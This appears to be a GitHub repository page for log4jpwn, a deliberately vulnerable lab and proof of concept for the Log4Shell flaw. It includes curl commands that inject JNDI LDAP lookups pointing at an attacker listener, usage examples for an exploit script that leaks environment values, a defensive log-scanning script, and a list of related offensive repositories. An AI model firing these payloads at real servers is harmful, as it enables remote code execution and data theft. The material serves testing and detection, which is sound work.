  • Stars: 308
  • Rank: 135,712 (Top 3 %)
  • Language: Python
  • License: GNU General Publi...
  • Created almost 3 years ago
  • Updated over 1 year ago


Repository Details

log4j rce test environment and poc

log4jpwn

log4j rce test environment. See: https://www.lunasec.io/docs/blog/log4j-zero-day/

This repository contains an intentionally vulnerable playground to play with CVE-2021-44228 (aka: log4shell)

Experiments to trigger the vulnerability in various software products mentioned here can be found in the vuln-software/ directory.

examples

(demo 1: using the included python poc)

(demo 2)

build

Either build the jar on your host with mvn clean compile assembly:single

Or use docker to build an image with docker build -t log4jpwn .

run

The server will log 3 things (which are also the triggers). You don't have to set all 3:

  • The User-Agent header content
  • The request path
  • The pwn query string parameter

To use:

  • Run the container with docker run --rm -p8080:8080 log4jpwn (or the jar if you built on your host with java -jar target/log4jpwn-1.0-SNAPSHOT-jar-with-dependencies.jar)
  • Make a curl request with a poisoned User-Agent header carrying your payload, e.g. curl -H 'User-Agent: ${jndi:ldap://172.16.182.1:8081/a}' localhost:8080, where 172.16.182.1 is where my netcat listener is running.

A complete example for all 3 bits that gets logged:

curl -v -H 'User-Agent: ${jndi:ldap://192.168.0.1:443/a}' 'localhost:8080/${jndi:ldap://192.168.0.1:443/a}/?pwn=$\{jndi:ldap://192.168.0.1:443/a\}'
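The three locations listed above (User-Agent header, request path and the pwn query parameter) are also the three places a defender should inspect. The following is an added example and is not code from the log4jpwn repository: it URL-decodes each of those fields (repeatedly, so double-encoded values are seen in clear) and reports any ${jndi:...} lookup string, first for a single request and then over access-log lines in the common Apache/nginx "combined" format. The log lines are constructed for the example, and 192.0.2.10 is a TEST-NET-1 placeholder address, not a real listener.

```python
"""Defender-side check for JNDI lookup strings in the three request fields
that the log4jpwn server logs: the User-Agent header, the request path and
the pwn query parameter.

Added example, not part of the log4jpwn repository. The sample log lines are
constructed; 192.0.2.10 is a documentation placeholder address.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# A log4j lookup of the form ${jndi:<scheme>:...}; whitespace and case are
# tolerated and the match stops at the first closing brace.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)

# Apache/nginx "combined" access-log format (assumed for the samples). The
# request target and the User-Agent are the attacker-controlled fields that
# also end up in the log.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def url_decode(value: str, rounds: int = 3) -> str:
    """URL-decode up to *rounds* times so that double-encoded payloads
    (%2524%257B...) are seen in their decoded form; stop once stable."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi(value: str) -> list[str]:
    """Return every JNDI lookup string found in *value* after URL-decoding."""
    return JNDI_RE.findall(url_decode(value))


def scan_request(target: str, headers: dict[str, str]) -> list[tuple[str, str]]:
    """Inspect the three logged locations of one request and return
    (location, payload) pairs. *target* is the request-target from the
    request line, e.g. '/some/path?pwn=...'."""
    hits: list[tuple[str, str]] = []
    parts = urlsplit(target)
    for payload in find_jndi(parts.path):
        hits.append(("path", payload))
    # parse_qsl decodes once; find_jndi decodes again for nested encoding.
    # Every parameter is checked, not only pwn, since the name is arbitrary.
    for name, val in parse_qsl(parts.query, keep_blank_values=True):
        for payload in find_jndi(val):
            hits.append((f"query:{name}", payload))
    for name, val in headers.items():
        if name.lower() == "user-agent":
            for payload in find_jndi(val):
                hits.append(("header:User-Agent", payload))
    return hits


def scan_access_log(lines: list[str]) -> list[tuple[str, str, str]]:
    """Run scan_request over combined-format log lines and return
    (client, location, payload) triples. Lines that do not parse are skipped."""
    findings: list[tuple[str, str, str]] = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for location, payload in scan_request(m["target"], {"User-Agent": m["ua"]}):
            findings.append((m["client"], location, payload))
    return findings


# Constructed sample lines: one benign request, and one carrying the lookup
# in all three logged locations, with the query value URL-encoded the way a
# client would send it.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:01 +0000] '
    '"GET /${jndi:ldap://192.0.2.10:443/a}/?pwn=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%3A443%2Fa%7D HTTP/1.1" '
    '404 0 "-" "${jndi:ldap://192.0.2.10:443/a}"',
]

if __name__ == "__main__":
    for client, location, payload in scan_access_log(SAMPLE_LOG):
        print(f"{client} {location}: {payload}")
```

Running the block prints one line per hit for the second sample request (path, query:pwn and header:User-Agent). The bounded decode loop matters: a value such as `%2524%257Bjndi...` reaches the logger as `${jndi...}` only after the application decodes it, so a single-pass check would miss it while log4j would still act on it.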

run - exploit

The python exploit will leak values. By default it will try ${java:version}, but you can specify anything with the --leak flag.

Usage is:

โฏ ./pwn.py --help
usage: pwn.py [-h] --target TARGET [--listen-host LISTEN_HOST] [--listen-port LISTEN_PORT] --exploit-host EXPLOIT_HOST [--leak LEAK]

a simple log4j <=2.14 information disclosure poc (ref: https://twitter.com/Black2Fan/status/1470281005038817284)

optional arguments:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        target uri
  --listen-host LISTEN_HOST
                        exploit server host to listen on (default: 127.0.0.1)
  --listen-port LISTEN_PORT, -lp LISTEN_PORT
                        exploit server port to listen on (default: 8888)
  --exploit-host EXPLOIT_HOST, -eh EXPLOIT_HOST
                        host where (this) exploit server is reachable
  --leak LEAK, -l LEAK  value to leak. see: https://twitter.com/Rayhan0x01/status/1469571563674505217 (default: ${java:version})

Example runs:

  • ./pwn.py --target http://localhost:8080 --exploit-host 127.0.0.1
  • ./pwn.py --target http://localhost:8080 --exploit-host 127.0.0.1 --leak '${env:SHELL}'
  • ./pwn.py --target http://localhost:8080 --exploit-host 127.0.0.1 --listen-port 5555

More Repositories

  • awesome-nmap-grep: Awesome Nmap Grep (283 stars)
  • frida-boot: Frida Boot 👢 - A binary instrumentation workshop, with Frida, for beginners! (CSS, 261 stars)
  • ooktools: 📡 On-off keying tools for your SD-arrrR (Python, 128 stars)
  • qrxfer: Transfer files from Air gapped machines using QR codes (Python, 93 stars)
  • dnsfilexfer: File transfer via DNS (Python, 63 stars)
  • wordpress-shell: Cheap & Nasty Wordpress Command Execution Shell (PHP, 63 stars)
  • hogar: A pluggable Telegram bot framework (Python, 52 stars)
  • trauth: 🔑 A simple Traefik ForwardAuth server for HTTP Basic SSO (Go, 30 stars)
  • tc2: traefik fronted c2 examples (Shell, 25 stars)
  • dotfiles: ⚡️• files | Batteries included, dotfile configurations (Shell, 16 stars)
  • PHPNessusNG: PHP wrapper functions for interfacing with the Nessus V6.x API (PHP, 15 stars)
  • find-gw: 🛰 A bash script to check if you have a gateway that could get you somewhere nice. (Shell, 14 stars)
  • public-talks: 🎤 A collection of presentation materials for my public talks. (12 stars)
  • metasploit-modules: Various Metasploit Modules (Ruby, 12 stars)
  • go-observe: 🌌 Go-Observe: A command line Mozilla Observatory client written in Go (Go, 12 stars)
  • socat23: Socat with SSL v2/3 Support (Shell, 11 stars)
  • py2gource: py2gource (Python, 11 stars)
  • pytel: A Pure Python telegram-cli Interface (Python, 10 stars)
  • history-here: A zsh plugin to quickly isolate shell history recording. (Shell, 9 stars)
  • longurl: A Command line URL Expander (Python, 8 stars)
  • golert: 🚨 an osquery powered, almost cross platform HIDS (Go, 8 stars)
  • php-nessus-api: PHP wrapper functions for the Nessus API (PHP, 8 stars)
  • nutstat: 🔌 a Network UPS Tools (NUT) to InfluxDB exporter, written in Go (Go, 6 stars)
  • weblick: A Web Information Gathering Tool (Python, 6 stars)
  • filesmudge: a silly file 'smudger' (Python, 5 stars)
  • KaliDocker: Kali Docker Image (5 stars)
  • tli: Twitter (command) Line Interface (Python, 4 stars)
  • PHP-ShockPot: Poor Man's Shellshock Honeypot (PHP, 3 stars)
  • godoh-clients: various godoh client experiments (C, 3 stars)
  • php-gitlab-jabberhook: A small library to parse Gitlab Webhooks and notify via XMPP (PHP, 3 stars)
  • elk-docker: ELK stack in Docker, with documentation issues fixed. (Shell, 3 stars)
  • adventofcode: adventofcode (Python, 2 stars)
  • codeql-vuln-blog: Intentionally Vulnerable Blog Web Application (Python, 2 stars)
  • not-infosec-twitter: Not Infosec Twitter (2 stars)
  • leonjza.github.io: 🐱‍👤 A checkbox Uncheckers' Notepad (Shell, 2 stars)
  • minigrep: 🦀 Rust Documentation Walkthrough - minigrep (Rust, 1 star)
  • dockerfiles: 🤖 A collection of dockerfiles (Shell, 1 star)
  • docker-elk: docker-elk repo, using the https://github.com/deviantony/docker-elk template (Dockerfile, 1 star)
  • flick-check: The Flick II Vulnerable VM Android Application (Java, 1 star)
  • composer-shell: A silly reverse shell invoked via the Composer Dependency Manager (PHP, 1 star)
  • codeql-uboot (CodeQL, 1 star)
  • leonjza-octopress.github.io: A checkbox Uncheckers' Notepad (HTML, 1 star)
  • hasher: Hasher™ is a completely client side password generator. (CSS, 1 star)
  • cvestream: a small utility to dump NVD information (Python, 1 star)
  • eskom-loadshedding-status: Eskom LoadShedding Status Bot (Python, 1 star)